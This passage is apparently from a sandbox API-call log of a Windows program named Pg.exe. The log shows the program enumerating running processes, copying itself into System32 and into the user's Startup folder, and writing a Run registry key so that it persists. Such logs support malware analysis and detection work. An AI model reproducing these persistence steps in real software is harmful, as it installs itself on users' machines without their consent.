cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0189.683] lstrlenW (lpString="playstation iraq.exe") returned 20 [0189.683] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0189.683] lstrlenW (lpString="harbor.exe") returned 10 [0189.683] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0189.684] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0189.684] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0189.685] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0189.685] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0189.686] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0189.686] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0189.686] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0189.686] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0189.687] lstrlenW (lpString="larent.exe") returned 10 [0189.687] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0189.688] lstrlenW (lpString="stereo.exe") returned 10 [0189.688] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0189.689] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0189.689] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0189.689] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0189.689] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0189.690] lstrlenW (lpString="state.exe") returned 9 [0189.690] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0189.691] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0189.691] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.691] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0189.691] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0189.692] lstrlenW (lpString="taskhostw.exe") returned 13 [0189.692] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0189.693] lstrlenW (lpString="sppsvc.exe") returned 10 [0189.693] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.694] lstrlenW (lpString="svchost.exe") returned 11 [0189.694] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0189.694] lstrlenW (lpString="Pg.exe") returned 6 [0189.694] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0189.695] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0189.695] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0189.696] lstrlenW (lpString="conhost.exe") returned 11 [0189.696] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0189.697] CloseHandle (hObject=0x334) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ae40 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60b158 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc0f8 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc158 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5faf48 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606800 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc038 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc078 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601598 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601318 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc098 | out: hHeap=0x5e0000) returned 1 [0189.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6013b8 | out: hHeap=0x5e0000) returned 1 [0189.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2345f98 [0189.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2355fa0 [0189.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.698] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x6014d0 [0189.698] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6014d0, Size=0x40) returned 0x60ae40 [0189.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.698] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x601688 [0189.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.698] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x6016d8 [0189.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.698] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x6014d0 [0189.698] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6014d0, Size=0x40) returned 0x60aed0 [0189.698] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2355fa0, nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Pg.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pg.exe")) returned 0x1e [0189.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2365fa8 [0189.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2375fb0 [0189.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.699] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x6014d0 [0189.699] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6014d0, Size=0x40) returned 0x60b080 [0189.699] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60b080, Size=0x80) returned 0x6078d0 [0189.699] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6078d0, Size=0x100) returned 0x5ef030 [0189.699] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0189.699] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0189.699] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\Pg.exe", lpDst=0x2365fa8, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\System32\\Pg.exe") returned 0x1b [0189.699] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2375fb0 | out: hHeap=0x5e0000) returned 1 [0189.699] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2365fa8 | out: hHeap=0x5e0000) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x282b020 [0189.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.702] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x6014f8 [0189.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.702] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x6012c8 [0189.702] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0189.702] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0189.702] Wow64DisableWow64FsRedirection (in: OldValue=0x19ddd0 | out: OldValue=0x19ddd0*=0x0) returned 1 [0189.702] lstrlenW (lpString="kernel32.dll") returned 12 [0189.702] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6014f8 | out: hHeap=0x5e0000) returned 1 [0189.702] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0189.702] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6012c8 | out: hHeap=0x5e0000) returned 1 [0189.702] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Pg.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pg.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0189.702] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Pg.exe" (normalized: "c:\\windows\\system32\\pg.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0189.703] ReadFile (in: hFile=0x334, lpBuffer=0x282b020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x282b020*, lpNumberOfBytesRead=0x19ddcc*=0x70800, lpOverlapped=0x0) returned 1 [0189.708] WriteFile (in: hFile=0x338, lpBuffer=0x282b020*, nNumberOfBytesToWrite=0x70800, lpNumberOfBytesWritten=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x282b020*, lpNumberOfBytesWritten=0x19ddcc*=0x70800, lpOverlapped=0x0) returned 1 [0189.722] ReadFile (in: hFile=0x334, lpBuffer=0x282b020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x282b020*, lpNumberOfBytesRead=0x19ddcc*=0x0, lpOverlapped=0x0) returned 1 [0189.722] CloseHandle (hObject=0x338) returned 1 [0189.771] CloseHandle (hObject=0x334) returned 1 [0189.771] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.771] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x6012c8 [0189.771] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.771] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x601368 [0189.771] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0189.771] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0189.771] Wow64DisableWow64FsRedirection (in: OldValue=0x19ddd0 | out: OldValue=0x19ddd0*=0x1) returned 1 [0189.771] lstrlenW (lpString="kernel32.dll") returned 12 [0189.772] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601368 | out: hHeap=0x5e0000) returned 1 [0189.772] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0189.772] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6012c8 | out: hHeap=0x5e0000) returned 1 [0189.772] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x282b020 | out: hHeap=0x5e0000) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.777] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x601318 [0189.777] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x601318, Size=0x40) returned 0x60b3e0 [0189.779] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60b3e0, Size=0x80) returned 0x6078d0 [0189.779] lstrlenW (lpString="C:\\WINDOWS\\System32\\Pg.exe") returned 26 [0189.779] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0189.779] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x5c) returned 0x5ee4e8 [0189.779] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x19dda0 | out: phkResult=0x19dda0*=0x334) returned 0x0 [0189.779] RegSetValueExW (in: hKey=0x334, lpValueName="Pg.exe", Reserved=0x0, dwType=0x1, lpData="C:\\WINDOWS\\System32\\Pg.exe", cbData=0x34 | out: lpData="C:\\WINDOWS\\System32\\Pg.exe") returned 0x0 [0189.780] RegCloseKey (hKey=0x334) returned 0x0 [0189.780] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ee4e8 | out: hHeap=0x5e0000) returned 1 [0189.780] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0189.780] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6078d0 | out: hHeap=0x5e0000) returned 1 [0189.780] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2365fa8 [0189.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2375fb0 [0189.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606800 [0189.781] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606800, Size=0x20) returned 0x601368 [0189.781] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x601368, Size=0x40) returned 0x60ae88 [0189.781] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60ae88, Size=0x80) returned 0x6078d0 [0189.781] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6078d0, Size=0x100) returned 0x5ef030 [0189.781] lstrlenW (lpString="") returned 0 [0189.781] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0189.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x6078d0 [0189.781] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19dd4c | out: phkResult=0x19dd4c*=0x334) returned 0x0 [0189.781] RegQueryValueExW (in: hKey=0x334, lpValueName="Startup", lpReserved=0x0, lpType=0x19dd58, lpData=0x2375fb0, lpcbData=0x19dd84*=0x7fff | out: lpType=0x19dd58*=0x0, lpData=0x2375fb0*=0x53, lpcbData=0x19dd84*=0x7fff) returned 0x2 [0189.781] RegCloseKey (hKey=0x334) returned 0x0 [0189.781] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6078d0 | out: hHeap=0x5e0000) returned 1 [0189.781] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0189.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x6078d0 [0189.781] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19dd4c | out: phkResult=0x19dd4c*=0x338) returned 0x0 [0189.783] RegQueryValueExW (in: hKey=0x338, lpValueName="Startup", lpReserved=0x0, lpType=0x19dd58, lpData=0x2375fb0, lpcbData=0x19dd84*=0x7fff | out: lpType=0x19dd58*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19dd84*=0x98) returned 0x0 [0189.783] RegCloseKey (hKey=0x338) returned 0x0 [0189.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6078d0 | out: hHeap=0x5e0000) returned 1 [0189.783] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0189.783] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0189.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0189.783] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Pg.exe", lpDst=0x2365fa8, nSize=0x7fff | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Pg.exe") returned 0x55 [0189.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2375fb0 | out: hHeap=0x5e0000) returned 1 [0189.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2365fa8 | out: hHeap=0x5e0000) returned 1 [0189.784] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x2820020 [0189.788] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606ba8 [0189.788] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606ba8, Size=0x20) returned 0x6012c8 [0189.788] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606b48 [0189.788] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606b48, Size=0x20) returned 0x601318 [0189.788] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0189.788] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0189.788] Wow64DisableWow64FsRedirection (in: OldValue=0x19ddd0 | out: OldValue=0x19ddd0*=0x1) returned 1 [0189.788] lstrlenW (lpString="kernel32.dll") returned 12 [0189.788] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6012c8 | out: hHeap=0x5e0000) returned 1 [0189.788] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0189.788] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601318 | out: hHeap=0x5e0000) returned 1 [0189.788] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Pg.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pg.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0189.789] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Pg.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\pg.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0189.791] ReadFile (in: hFile=0x338, lpBuffer=0x2820020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x2820020*, lpNumberOfBytesRead=0x19ddcc*=0x70800, lpOverlapped=0x0) returned 1 [0189.807] WriteFile (in: hFile=0x33c, lpBuffer=0x2820020*, nNumberOfBytesToWrite=0x70800, lpNumberOfBytesWritten=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x2820020*, lpNumberOfBytesWritten=0x19ddcc*=0x70800, lpOverlapped=0x0) returned 1 [0189.815] ReadFile (in: hFile=0x338, lpBuffer=0x2820020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x2820020*, lpNumberOfBytesRead=0x19ddcc*=0x0, lpOverlapped=0x0) returned 1 [0189.815] CloseHandle (hObject=0x33c) returned 1 [0189.825] CloseHandle (hObject=0x338) returned 1 [0189.825] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606b48 [0189.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606b48, Size=0x20) returned 0x601610 [0189.825] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606ab8 [0189.825] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606ab8, Size=0x20) returned 0x601520 [0189.825] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0189.825] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0189.825] Wow64DisableWow64FsRedirection (in: OldValue=0x19ddd0 | out: OldValue=0x19ddd0*=0x1) returned 1 [0189.825] lstrlenW (lpString="kernel32.dll") returned 12 [0189.825] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601520 | out: hHeap=0x5e0000) returned 1 [0189.825] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0189.826] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601610 | out: hHeap=0x5e0000) returned 1 [0189.826] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2820020 | out: hHeap=0x5e0000) returned 1 [0189.831] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2365fa8 [0189.831] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2375fb0 [0189.831] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606c20 [0189.832] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606c20, Size=0x20) returned 0x6012c8 [0189.832] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6012c8, Size=0x40) returned 0x60af60 [0189.832] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60af60, Size=0x80) returned 0x6078d0 [0189.832] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6078d0, Size=0x100) returned 0x5ef030 [0189.832] lstrlenW (lpString="") returned 0 [0189.832] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0189.832] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x6078d0 [0189.832] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19dd4c | out: phkResult=0x19dd4c*=0x338) returned 0x0 [0189.832] RegQueryValueExW (in: hKey=0x338, lpValueName="Common Startup", lpReserved=0x0, lpType=0x19dd58, lpData=0x2375fb0, lpcbData=0x19dd84*=0x7fff | out: lpType=0x19dd58*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19dd84*=0x78) returned 0x0 [0189.832] RegCloseKey (hKey=0x338) returned 0x0 [0189.832] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6078d0 | out: hHeap=0x5e0000) returned 1 [0189.832] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0189.832] lstrlenW 